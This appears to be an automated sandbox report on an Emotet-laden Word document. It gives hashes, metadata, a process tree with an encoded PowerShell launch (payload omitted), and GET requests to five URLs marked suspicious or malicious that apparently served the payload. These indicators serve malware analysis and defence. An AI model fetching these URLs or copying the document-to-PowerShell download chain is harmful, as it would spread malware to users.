| Field | Value |
|---|---|
| File name | jxCitTyH |
| Full analysis | https://app.any.run/tasks/6e74ed8d-aa44-457b-94dd-5cd04a9adb21 |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into highly destructive malware. It mostly targets corporate victims, but private users are also infected in mass spam email campaigns. |
| Analysis date | October 14, 2019, 13:45:25 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: XSS, Subject: Enterprise-wide, Author: Julio Quitzon, Keywords: primary, Comments: technologies, Template: Normal.dotm, Last Saved By: Felipa Fadel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 21:31:00 2019, Last Saved Time/Date: Fri Oct 11 21:31:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
| MD5 | 73C3127D7C4AF73231D1302431A80D35 |
| SHA1 | 689BE14C748089277D18582EBAF192C5C218CD1A |
| SHA256 | A85CC2088EAF316B8FCF3C7F33996B1ACF93F99F820EAA9DFAC83D0637ADC9CE |
| SSDEEP | 6144:ZkPNPAAKUzSRnLx3f4td9pB8LGme764XNNHBly:ZkPNPARUGRt383B8LGL6CNJ/ |
| Extension | Detected type |
|---|---|
| .doc | Microsoft Word document (54.2) |
| .doc | Microsoft Word document (old ver.) (32.2) |
| Property | Value |
|---|---|
| Title | XSS |
| Subject | Enterprise-wide |
| Author | Julio Quitzon |
| Keywords | primary |
| Comments | technologies |
| Template | Normal.dotm |
| LastModifiedBy | Felipa Fadel |
| RevisionNumber | 1 |
| Software | Microsoft Office Word |
| TotalEditTime | - |
| CreateDate | 2019:10:11 20:31:00 |
| ModifyDate | 2019:10:11 20:31:00 |
| Pages | 1 |
| Words | 30 |
| Characters | 173 |
| Security | None |
| CodePage | Windows Latin 1 (Western European) |
| Company | Greenfelder Group |
| Lines | 1 |
| Paragraphs | 1 |
| CharCountWithSpaces | 202 |
| AppVersion | 16 |
| ScaleCrop | No |
| LinksUpToDate | No |
| SharedDoc | No |
| HyperlinksChanged | No |
| TitleOfParts | - |
| HeadingPairs | - |
| Manager | Cummings |
| CompObjUserTypeLen | 32 |
| CompObjUserType | Microsoft Word 97-2003 Document |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 2572 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\jxCitTyH.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3860 | powershell -enco [encoded command omitted from the report] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA2F1.tmp.cvr | — | — | — |
| 3860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M2R1NW6S6W1IQNZMIBGE.temp | — | — | — |
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\314068A8.wmf | wmf | 5FD1025D181521CA09BA11EC8B9B3763 | 6C0C3BC9CB28A4EE5F83A4A24931934EE9CA52A4E865E79681DE89EF16C7FBCE |
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6132C40A.wmf | wmf | F2BD45B01BC48C3BD3CB032D0092D5D8 | C4B51CD0BF806905DC1993BB263F08B5850AF210883C004474023E9B610E774B |
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29EDAC74.wmf | wmf | 26AC648AC4001241034B6F17962B2030 | F6BE220F89B964E838B049B8BCC34E55D38A52886CAC878DCBC420E0D853D6AC |
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5FADCF6.wmf | wmf | 6EA092AB08A0B113D41166F15004DADF | 358642467C3F68BFEFC8294D7479D9B3CFA18680275206C235C348A4F340C990 |
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 8B378DCC62035BBABEF8B1C2A131A338 | 7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275 |
| 3860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62604089.wmf | wmf | 0D0D6B24899234D250EEF6812177B5B5 | 270ED5DD9032A75E248E9D28CA60DDF6A7DFEF7450424520C830AC1CFFD441CD |
| 3860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39ae8a.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3860 | powershell.exe | GET | 404 | 35.184.134.213:80 | http://xsnonline.us/blogs/4x466v/ | US | xml | 345 b | suspicious |
3860 | powershell.exe | GET | 404 | 63.250.34.68:80 | http://obbydeemusic.com/aqoeivj4fd/us5htvn/ | US | xml | 345 b | malicious |
3860 | powershell.exe | GET | 404 | 43.229.153.78:80 | http://veeplan.com/wp-content/dW0o3RoJNG/ | HK | xml | 345 b | suspicious |
3860 | powershell.exe | GET | 404 | 142.4.50.75:80 | http://www.kmacobd.com/u9r/ | US | xml | 345 b | suspicious |
3860 | powershell.exe | GET | 404 | 101.227.64.237:80 | http://aijdjy.com/dup-installer/t0/ | CN | xml | 345 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3860 | powershell.exe | 63.250.34.68:80 | obbydeemusic.com | Frontline Data Services, Inc | US | unknown |
3860 | powershell.exe | 43.229.153.78:80 | veeplan.com | Hong Kong Telecom Global Data Centre | HK | suspicious |
3860 | powershell.exe | 35.184.134.213:80 | xsnonline.us | Google Inc. | US | suspicious |
3860 | powershell.exe | 101.227.64.237:80 | aijdjy.com | China Telecom (Group) | CN | unknown |
3860 | powershell.exe | 142.4.50.75:80 | www.kmacobd.com | WebNX, Inc. | US | suspicious |
| Domain | IP | Reputation |
|---|---|---|
| xsnonline.us | — | suspicious |
| obbydeemusic.com | — | malicious |
| veeplan.com | — | suspicious |
| www.kmacobd.com | — | suspicious |
| aijdjy.com | — | unknown |